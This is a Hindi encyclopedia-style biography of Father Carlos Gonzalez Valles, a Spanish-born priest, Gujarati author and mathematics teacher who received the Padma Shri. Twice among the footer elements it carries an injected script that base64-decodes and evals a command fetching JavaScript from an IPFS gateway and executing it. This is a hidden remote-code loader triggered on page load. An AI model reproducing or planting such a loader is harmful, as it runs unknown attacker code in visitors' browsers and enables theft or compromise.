फ़ादर वालेस

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें
फ़ादर कार्लोस गोन्‍ज़ालेज़ वालेस

फ़ादर कार्लोस गोन्‍ज़ालेज़ वालेस (अंग्रेज़ी: Father Carlos Gonzalez Valles, जन्म- 4 नवंबर, 1925; मृत्यु- 9 नवम्बर, 2020) स्पेनिश मूल के मशहूर गुजराती लेखक एवं पादरी थे। शिक्षा और साहित्य के क्षेत्र में योगदान हेतु उन्हें वर्ष 2021 में 'पद्मश्री' से सम्मानित किया गया। साहित्य में उल्लेखनीय योगदान के लिए उन्हें 1966 में कुमार चंद्रक, 1978 में रणजीतराम स्वर्ण पदक मिला था।

  • फ़ादर वालेस ने गुजराती में कई पुस्तकें लिखीं और गुजरात विश्वविद्यालय में कई दशकों तक गणित पढ़ाया।
  • 9 नवम्बर, 2020 को उनकी मृत्यु पर प्रधानमंत्री नरेंद्र मोदी ने ट्वीट कर कहा, "गणित और गुजराती साहित्य सहित कई क्षेत्रों में उन्होंने उत्कृष्टता हासिल की। समाज सेवा के प्रति भी वह बहुत गंभीर थे। उनके निधन से दु:खी हूं। ईश्वर उनकी आत्मा को शांति दें"।
  • गुजरात के मुख्यमंत्री विजय रूपाणी, कांग्रेस के राज्यसभा सांसद अहमद पटेल, गुजरात की कांग्रेस इकाई के अध्यक्ष अमित चावड़ा और नेता प्रतिपक्ष परेश धनानी ने भी फ़ादर वालेस के निधन पर शोक व्यक्त किया।
  • फ़ादर वालेस का जन्म स्पेन के लोगरोनो में 4 नवंबर, 1925 को हुआ था। वह 15 वर्ष की आयु में ही धार्मिक कार्यों के लिए भारत आ गए थे।
  • उन्होंने मद्रास विश्वविद्यालय से शिक्षा पूरी की और अहमदाबाद के गुजरात विश्वविद्यालय में गणित पढ़ाया।
  • दशकों तक फ़ादर वालेस भारत में रहे और गुजराती के साथ-साथ अंग्रेज़ी और स्पेनिश भाषाओं में भी उन्होंने व्यापक तौर पर लिखा।


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

टीका टिप्पणी और संदर्भ

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>